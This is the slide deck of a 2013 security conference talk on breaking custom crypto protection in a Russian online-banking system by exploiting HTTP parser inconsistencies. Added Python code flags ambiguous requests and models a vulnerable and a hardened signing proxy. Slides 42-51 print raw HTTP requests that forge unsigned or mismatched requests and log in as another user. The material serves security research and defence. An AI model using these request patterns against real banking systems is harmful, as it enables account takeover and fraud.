You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps

Our talk from Hack in the Box Amsterdam 2013.
It's no surprise that a typical hacker's professional path hits against custom crypto protocols from time to time. There are lots of application-specific crypto-hardened protocols written from scratch that can be found in banking, SCADA, and other types of not-so-common hardware and software systems. In this presentation, we propose a methodology for breaking into such systems using a top-down approach, with GOST-hardened banking applications as an example. We show how easy it is to bypass complex crypto protections because developers have inconsistent knowledge of modern application-level protocols.


  1. You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
     Andrew Petukhov (Founder/CTO, Solidlab), George Noseevich (PhD student, MSU), Dennis Gamayunov (Acting Head, Information Systems Security Lab, MSU)
  2. And along comes… INTRO
  3. Part One
     "There was me, that is Dennis, and my two droogs, that is Georgie and Andrew, and we sat in the lab making up our rassoodocks what to do with the Big Bank's RBS, a GOST crypto hardened bastard though rare."
  4. What we see
     • An RBS, which uses crypto for
       – Non-repudiation
       – Authenticity
       – Protocol security
     • The RBS complies with Russian Central Bank regulations
     • …unbreakable :-(
  5. What's it going to be then, eh?
  6. What comes with UltraViolence
     • Bypass non-repudiation (force the RBS to process non-signed requests)
     • Bypass the second authentication layer (enforced with crypto)
     • Which finally allowed us to log in to the RBS as any valid user and file any request to the RBS
  7. And along comes… SYSTEM UNDER ASSESSMENT
  8. Target application type (1/3)
     • We aim at pentesting financial organizations, who try to:
       – Ensure transport layer security, non-repudiation and authentication
       – Comply with regulations
       – Protect legacy systems
  9. Target application type (2/3)
     • Technical best practices
       – Confidentiality, authenticity, non-repudiation
     • Compliance
       – Use of certified crypto
     • Business needs
       – In-house vs outsourced
       – Solid vs modular
       – A customer does not simply develop his own certified crypto
       – Outsourcing app development to certified crypto writers: never a good idea
  10. Target application type (3/3)
     • Solution: crypto-hardened thick client + server-side application-specific crypto proxy
  11. Seeding the arch
     Diagram: business logic over HTTP. Client side: Browser. Server side: RBS Application Server.
  12. Let's add some REQs
     Diagram, Req++: Transport security & Certified crypto. Client side: Browser → Tunnel endpoint. Server side: Crypto server powered by a certified crypto provider (terminates the tunnel) → RBS Application Server.
  13. A little bit more...
     Diagram, Req++: Authenticity & Non-repudiation. Client side: Browser → Tunnel endpoint (signs the ingress request, puts everything into custom headers). Server side: Crypto server (verifies the signature; if OK, logs for non-repudiation and passes upstream) → RBS Application Server (trusts custom headers; matches the id from the session with the id from the header).
  14. And along comes… METHODOLOGY
  15. Common sense suggests
     • One doesn't simply implement an application level crypto protocol
     • One doesn't simply implement an HTTP client or server from scratch
     • Many parsers in a row suggest inconsistencies => possibility for smuggling
  16. Objective
     • Objective:
       – find differences in HTTP handling at the crypto server side and at the application server side
     • Exploit:
       – use the differences to bypass signature validation
  17. Basic steps for reversing arch
     • Reverse client side features
     • Survey server side features
     • Fingerprint the integration protocol
  18. Dealing with client side crypto
     • Which HTTP client and what HTTP parser are used?
       – e.g. Windows API or Java HttpClient
     • What parts of the HTTP request are getting signed?
       – in POST? in GET? in HEAD? in TRACE?
     • What additional metadata is attached to requests?
       – how is the signature stored?
       – how is the key ID passed to the server?
  19. Because nothing ever changes…
     • XML Signature Wrapping
       – another kind of "You can be anything you want to be": www.youtube.com/watch?v=RHIkb9yEV1k
       – "Analysis of Signature Wrapping Attacks and Countermeasures"
     • CWE-347: Improper Verification of Cryptographic Signature and related CVEs
     • Web App Cryptology: A Study in Failure
     • Now and then: insecure random numbers
     • Now and then: improper PKI implementation
  20. Fingerprinting HTTP parsers
     • HTTP parameter pollution
       – the same parameter in query or body
       – the same parameter in query and body
     • Duplicate headers
       – control headers with metadata
       – Content-Length header
     • HTTP parameter contamination
       – which characters are valid for termination of header values?
  21. Fingerprinting WWW server
     • Which HTTP version is supported?
       – does the crypto server support multiple HTTP requests per connection?
       – does it support HTTP/0.9?
     • How does the crypto server treat incorrect or duplicate Content-Length headers?
     • Which HTTP methods does it support?
     • Does the crypto server support multipart requests or chunked encoding?
  22. Because nothing ever changes…
     • Google for <HPP bypass WAF>
     • CWE-444: Inconsistent Interpretation of HTTP Requests
     • and all the CVE instances related to CWE-444
  23. Fingerprinting integration protocol
     • How does the crypto server communicate validation status and metadata to the application server?
       – metadata is relayed as submitted by the client
       – in a yet unknown part of the request
       – how to get into that part?
     • HTTP TRACE method / debug interface in the web application / guess / bruteforce / read documentation / ask developers, aka social engineering
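An added example, not from the talk, of the fail-closed check a signing proxy should run before it signs or forwards anything: it flags the request features from slides 20-21 that let two parsers in a row disagree about what a request means. The raw requests are constructed from the slides' examples (with Content-Length made consistent with the body), and the real crypto server in the case study performs no such check.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Control characters that different parsers may or may not accept as the end
# of a header value (slide 20, "HTTP parameter contamination").
CTL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def parse_request(raw: str):
    """Minimal splitter: request line, (name, value) headers keeping duplicates
    and order, and the body exactly as received."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def ambiguities(raw: str) -> list:
    """Return every feature of `raw` that two HTTP parsers could read differently.
    A signing proxy should refuse to sign (and forward) anything on this list."""
    request_line, headers, body = parse_request(raw)
    findings = []
    parts = request_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/1."):
        return [f"non-HTTP/1.x request line: {request_line!r}"]  # e.g. HTTP/0.9
    method, target, _ = parts

    # Duplicate headers (slide 20): which copy does each hop honour?
    names = [n for n, _ in headers]
    findings += sorted(f"duplicate header: {n}" for n in set(names) if names.count(n) > 1)

    # Message framing (slide 21): conflicting or malformed length information.
    cl = [v for n, v in headers if n == "content-length"]
    if cl and any(n == "transfer-encoding" for n, _ in headers):
        findings.append("content-length together with transfer-encoding")
    for v in cl:
        if not v.isdigit():
            findings.append(f"malformed content-length: {v!r}")
    if len(cl) == 1 and cl[0].isdigit() and int(cl[0]) != len(body):
        findings.append("content-length does not match body length")

    # A body on a method the crypto server never signs (slides 41-43 and 50).
    if body and method in ("GET", "HEAD", "TRACE"):
        findings.append(f"body on {method}")

    # Parameter pollution (slide 20): same name twice in query, body or both.
    q = [k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    b = [k for k, _ in parse_qsl(body, keep_blank_values=True)] if body else []
    findings += sorted(f"repeated query parameter: {k}" for k in set(q) if q.count(k) > 1)
    findings += sorted(f"repeated body parameter: {k}" for k in set(b) if b.count(k) > 1)
    findings += sorted(f"parameter in query and body: {k}" for k in set(q) & set(b))

    # Contamination (slide 20): control characters inside header values.
    findings += [f"control character in header {n}" for n, v in headers if CTL.search(v)]
    return findings


# Constructed inputs modelled on slides 39, 44 and 50.
CLEAN = "GET /login?name=value HTTP/1.1\r\nHost: 10.6.28.19\r\n\r\n"
TAKE_TWO = ("POST /bank/welcome?name=value1 HTTP/1.1\r\nHost: 10.6.28.19\r\n"
            "Content-Length: 11\r\n\r\nname=value2")
HEAD_WITH_BODY = ("HEAD /login?sName=772865163421&sPass=valid.21 HTTP/1.1\r\n"
                  "Host: 10.6.28.19\r\nConnection: keep-alive\r\n"
                  "Content-Length: 10\r\n\r\np=nonempty")
DOUBLE_CL = ("POST /x HTTP/1.1\r\nHost: 10.6.28.19\r\nContent-Length: 3\r\n"
             "Content-Length: 5\r\n\r\nabc")

if __name__ == "__main__":
    for raw in (CLEAN, TAKE_TWO, HEAD_WITH_BODY, DOUBLE_CL):
        print(raw.split("\r\n")[0], "->", ambiguities(raw) or "ok")
```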
  24. And along comes… CASE STUDY
  25. It all started as an ordinary hack
     ● Test our shiny RBS web app, they said
     ● It comes with a certified crypto protection, they said
     ● Instantly found some common web app bugs
  26. …then the crypto came into play
     ● Crypto ensures non-repudiation
       – Your crypto-signed attack vectors will be used against you in court
     ● Crypto ensures authenticity
       – Session hijacking is essentially useless
       – Can't log in as another user without his keys
     ● This greatly reduces severity
  27. Reversing the client
     ● Closed-source Windows app
     ● Traffic dump gives no clues
     ● The protocol is custom, no docs available
     ● No time for long IDA sessions
     ● Seems tough
  28. Reversing the client: the lazy way
     ● Client uses crypto primitives from bundled shared libs
     ● Library call hooks and API call traces FTW!
     ● Filter traces to get data that is easy to understand
     ● API Monitor (bit.ly/37BTzf)
  29. API call trace (screenshot)
  30. API call trace: Encrypt user data
  31. API call trace: What is being encrypted?
  32. API call trace: What is being encrypted?
  33. API call trace: What is being encrypted?
  34. API call trace: What is being signed?
  35. API call trace: Send it through the tunnel
  36. API call trace: Receive encrypted response
  37. API call trace: Decrypt the response
  38. API call trace: Send it back to browser
  39. So it comes like this
     Diagram, Req++: Authenticity & Non-repudiation (the architecture of slide 13). The browser sends:
       GET /login?name=value HTTP/1.1
       Host: 10.6.28.19
  40. And is secured like this
     After the tunnel endpoint:
       GET /login?name=value HTTP/1.1
       Host: 10.6.28.19
       Certificate_number: 0x849
       Form_data: name=value
       Signature: 6B8A57A3EA9C25D77C01F4E957D5752C69F61D
                  3451E87DD18046C51DC9A9AD63C7718708159B
                  7ECF5FC8EDF4424F813DB65EF5E2D21D2F389E
                  03319CA25D7003
  41. Further notices
     ● Proxy signs the query string for GET, the message body for POST
     ● The server actually checks that Form_data reflects the query string/body
     ● The server checks the Cert_num and signature
     ● The web app checks that cert_num matches the current user
     ● Kinda unbreakable, heh?
  42. Non-repudiation – Take one
     Bypass non-repudiation. The browser sends:
       HEAD /bank/welcome?name=value HTTP/1.1
       Host: 10.6.28.19
  43. Non-repudiation – Take one
     After the tunnel endpoint (no Form_data, no Signature):
       HEAD /bank/welcome?name=value HTTP/1.1
       Host: 10.6.28.19
       Certificate_number: 0x849
  44. Non-repudiation – Take two
     Bypass non-repudiation. The browser sends:
       POST /bank/welcome?name=value1 HTTP/1.1
       Host: 10.6.28.19
       Content-Length: 15

       name=value2
  45. Non-repudiation – Take two
     After the tunnel endpoint (only the body is signed):
       POST /bank/welcome?name=value1 HTTP/1.1
       Host: 10.6.28.19
       Content-Length: 15
       Certificate_number: 0x849
       Form_data: name=value2
       Signature: 3195E979E107731A2572197AB9D8BC01CE2C7EE0C4
                  2B97A02393F1263C23E25D2D21E7AA7CB07114491A
                  72750C2EFD1AEEAEB357C874BFB3100336F5BD01C0
                  0C

       name=value2
  46. Non-repudiation – Take two – Exploit (!!!)
     Bypass non-repudiation:
       POST /bank/welcome?name=attack-value HTTP/1.1
       Host: 10.6.28.19
       Content-Length: 15
       Certificate_number: 0x849
       Form_data: name=common-value
       Signature: 3195E979E107731A2572197AB9D8BC01CE2C7EE0C42B9
                  7A02393F1263C23E25D2D21E7AA7CB07114491A72750C
                  2EFD1AEEAEB357C874BFB3100336F5BD01C00C

       name=common-value
  47. So what?
     In Soviet Russia who cares about repudiation?
  48. Authentication – Log in as any other user
     Bypass crypto authentication:
       POST http://10.6.28.19/login HTTP/1.1
       Host: 10.6.28.19
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 36
       Certificate_number: 0x717

       sName=772965163660&sPass=valid.60
  49. Authentication – Crypto id and session id do not match
     Diagram: bypass crypto authentication (same architecture as slide 13).
  50. Authentication – But…
     Bypass crypto authentication. The browser sends:
       HEAD http://10.6.28.19/login?sName=772865163421&sPass=valid.21 HTTP/1.1
       Host: 10.6.28.19
       Connection: keep-alive
       Content-Length: 10

       p=nonemptybody
       POST http://10.6.28.19/login HTTP/1.1
       Host: 10.6.28.19
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 36
       Certificate_number: 0x717

       sName=772965163660&sPass=valid.60
  51. Authentication – But…
     After the tunnel endpoint:
       HEAD http://10.6.28.19/login?sName=772865163421&sPass=valid.21 HTTP/1.1
       Host: 10.6.28.19
       Connection: keep-alive
       Content-Length: 10
       Certificate_number: 0x849

       p=nonemptybody
       POST http://10.6.28.19/login HTTP/1.1
       Host: 10.6.28.19
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 36
       Certificate_number: 0x717

       sName=772965163660&sPass=valid.60
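An added model, not the bank's or the authors' code, of the split the case study reverse-engineered: the `_v1` functions implement the rule of slide 41 (sign the query string for GET, the body for POST, pass custom headers upstream) together with a web app that reads the query string first, as slide 46 implies; the `_v2` functions show the defender's fix, which signs method, request-target and body for every method, recomputes that material server-side from the request as received, and strips client-supplied metadata headers before setting its own. HMAC-SHA256 with per-certificate keys stands in for the certified GOST signature; the keys, the `Request` class and the function names are assumptions, and slides 50-51 are modelled only as far as the trusted header goes.

```python
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed stand-in for the certified crypto provider: one HMAC key per
# certificate number (0x849 is the tester's own certificate in the slides).
KEYS = {"0x849": b"key-for-0x849", "0x717": b"key-for-0x717"}
META = ("Certificate_number", "Form_data", "Signature")

@dataclass
class Request:
    method: str
    target: str                       # request-target as sent, query included
    body: str = ""
    headers: dict = field(default_factory=dict)

    def query(self) -> str:
        return urlsplit(self.target).query

def sign(cert: str, material: str) -> str:
    return hmac.new(KEYS[cert], material.encode(), hashlib.sha256).hexdigest()

# --- v1: the scheme of slides 39-41 as reverse-engineered (vulnerable) ---
def material_v1(req: Request) -> Optional[str]:
    # Query string for GET, body for POST, nothing at all for any other method.
    if req.method == "GET":
        return req.query()
    if req.method == "POST":
        return req.body
    return None

def proxy_v1(req: Request, cert: str) -> Request:
    # Tunnel endpoint: signs what material_v1 selects and touches nothing else.
    mat = material_v1(req)
    if mat is not None:
        req.headers["Certificate_number"] = cert
        req.headers["Form_data"] = mat
        req.headers["Signature"] = sign(cert, mat)
    return req

def verify_v1(req: Request) -> bool:
    # Crypto server: Form_data must reflect the query/body and be validly signed.
    mat = material_v1(req)
    if mat is None:                       # HEAD, TRACE, ...: nothing to check
        return True
    h = req.headers
    cert = h.get("Certificate_number")
    if cert not in KEYS or "Signature" not in h or h.get("Form_data") != mat:
        return False
    return hmac.compare_digest(h["Signature"], sign(cert, mat))

def app_param(req: Request, name: str) -> Optional[str]:
    # Web app: the query string wins over the body (assumed framework precedence).
    params = dict(parse_qsl(req.body))
    params.update(parse_qsl(req.query()))
    return params.get(name)

# --- v2: hardened version added here (not the fix the bank shipped) ---
def material_v2(req: Request) -> str:
    # Cover method, full request-target and body, with an explicit body length.
    return "\n".join([req.method, req.target, str(len(req.body)), req.body])

def proxy_v2(req: Request, cert: str) -> Request:
    for name in META:                     # never forward client-supplied metadata
        req.headers.pop(name, None)
    mat = material_v2(req)
    req.headers["Certificate_number"] = cert
    req.headers["Form_data"] = mat
    req.headers["Signature"] = sign(cert, mat)
    return req

def verify_v2(req: Request) -> bool:
    # Every method needs a signature; the material is recomputed from what arrived.
    h = req.headers
    cert = h.get("Certificate_number")
    if cert not in KEYS or "Signature" not in h or h.get("Form_data") != material_v2(req):
        return False
    return hmac.compare_digest(h["Signature"], sign(cert, h["Form_data"]))

# --- the case-study situations, parameterised by the version under test ---
def take_two(proxy, verify):
    # Slides 44-46: sign a benign POST, then change the query string afterwards.
    req = proxy(Request("POST", "/bank/welcome?name=common-value", "name=common-value"), "0x849")
    req.target = "/bank/welcome?name=attack-value"  # outside v1's signed material
    return verify(req), app_param(req, "name")

def take_one(verify) -> bool:
    # Slides 42-43: a HEAD request carrying a certificate number but no signature.
    req = Request("HEAD", "/bank/welcome?name=value", headers={"Certificate_number": "0x849"})
    return verify(req)

def forged_cert_header(proxy) -> str:
    # Slides 50-51: the client supplies another user's Certificate_number itself.
    req = Request("HEAD", "/login?sName=x", headers={"Certificate_number": "0x717"})
    return proxy(req, "0x849").headers["Certificate_number"]
```

With v1 the tampered POST verifies and the app acts on the unsigned value; with v2 the same tampering fails verification, the unsigned HEAD is rejected, and the forged certificate header never reaches the web app.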
  52. And along comes… WRAP UP
  53. At first I was like…
     • How a typical pentester sees a custom crypto protocol
  54. But then…
     • It looks more intriguing
  55. No surprise
     • "I definitely believe that cryptography is becoming less important. In effect, even the most secure computer systems in the most isolated locations have been penetrated over the last couple of years by a series of APTs and other advanced attacks," Shamir said during the Cryptographers' Panel session at the RSA Conference 2013
  56. Violent curiosity leads to…
     • …successful bypass
  57. Contacts
     George Noseevich, @webpentest, webpentest@bushwhackers.ru
     Andrew Petukhov, @p3tand, andrew.petukhov@solidlab.ru
     Dennis Gamayunov, @jamadharma, gamajun@seclab.cs.msu.su
